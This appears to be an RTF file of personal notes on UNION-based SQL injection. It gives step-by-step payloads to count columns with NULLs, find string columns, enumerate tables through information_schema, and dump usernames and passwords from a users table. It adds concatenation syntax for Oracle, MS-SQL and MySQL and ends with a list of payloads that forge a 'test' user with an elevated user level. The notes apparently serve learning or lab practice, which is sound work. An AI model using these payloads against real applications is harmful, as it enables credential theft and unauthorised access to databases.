{\rtf1\ansi\ansicpg1252\cocoartf1404\cocoasubrtf470
{\fonttbl\f0\fnil\fcharset0 Calibri;}
{\colortbl;\red255\green255\blue255;}
\paperw11900\paperh16840\margl1440\margr1440\vieww17280\viewh10460\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\b\fs30 \cf1 \cb0 \expnd0\expndtw0\kerning0
\ul \ulc1 THE UNION OPERATOR\

\b0 \ulnone \
With union you can combine results of 2 or more select statements into a single result set.\
\
So if you do not know the data type you can use SELECT NULL.\
\
STEPS:\
\
	1. \'91UNION SELECT NULL- -\
	2. \'91UNION SELECT NULL,NULL- -\
	3. \'91UNION SELECT NULL,NULL,NULL- -\
	4. \'91UNION SELECT NULL,NULL,NULL,NULL- -\
\
IF THE QUERY GETS EXECUTED YOU HAVE FOUND THE NUMBER OF COLUMNS\
\
You can now find type etc. -> \'91UNION SELECT @@version,NULL,NULL- -\
\
\pard\pardeftab720\partightenfactor0

\b\fs29\fsmilli14667 \cf1 \ul EXTRACTING USEFULL DATA:\
\

\b0 \ulnone 1. Test for a single column -> name=Mat\'92 union select null- - \
					OR name=Mat\'92 union select null,null- - \
					OR name=Mat\'92 union select null,null,null- -\
					and so on until it runs\
\
2. Test if first column has string type -> name=MAt\'92 union select \'91a\'92,null,null- -\
\
3. Find out names of tables and columns  -> Using information_schema.columns \
		name=Mat\'92 union select table_name,column_name,null from information_schema.columns- -\
\
4.Extract data from users table (found from Step 3)\
		name=Mat\'92 union select username,password,null from users- -
\b \ul \
\
\
CONCATENATE:\
\
\ulnone Oracle: SELECT table_name||\'92:\'92||column_name FROM all_tab_columns\
\
MS-SQL: SELECT table_name+\'92:\'92+column_name FROM information_schema.columns\
\
MySQL: SELECT CONCAT(table_name,\'92:\'92,column_name) FROM  information_schema.columns\ul \
\
\
a' UNION ALL SELECT \'91test\'92 as username, 'test' as password, '1338' as user_level FROM users; #\
a' UNION ALL SELECT \'91test\'92 as username, 'test' as password, '1338' as user_level, NULL FROM users; #\
a' UNION ALL SELECT \'91test\'92 as username, 'test' as password, '1338' as user_level, NULL, NULL FROM users; #  \
test' UNION  SELECT null #\
test' UNION  SELECT null,null #\
test' UNION  SELECT null,null,null #\
test' UNION  SELECT null,null,null,null #\
test' UNION ALL SELECT 'test' as username, 'test' as password, '1338', null #\
test' UNION ALL SELECT 'test' as username, 'test' as password, '1338', null, null #\
test' UNION ALL SELECT 'test' as username, 'test' as password, '1338', null, null, null # - To find the number of columns\
\
Mix null to identify correct position\
\
test' UNION ALL SELECT 'test' as username, null, 'test' as password, 1338 as user_level, null #\
test' UNION ALL SELECT null, \'92test' as username, null, 'test' as password, 1338 as user_level #\
test' UNION ALL SELECT 'test' as username, null, null, 'test' as password, 1338 as user_level #\
test' UNION ALL SELECT 'test' as username, 'test' as password, null, 1338 as user_level, null #\
test' UNION ALL SELECT 'test' as username, null, 'test' as password, null, 1338 as user_level #}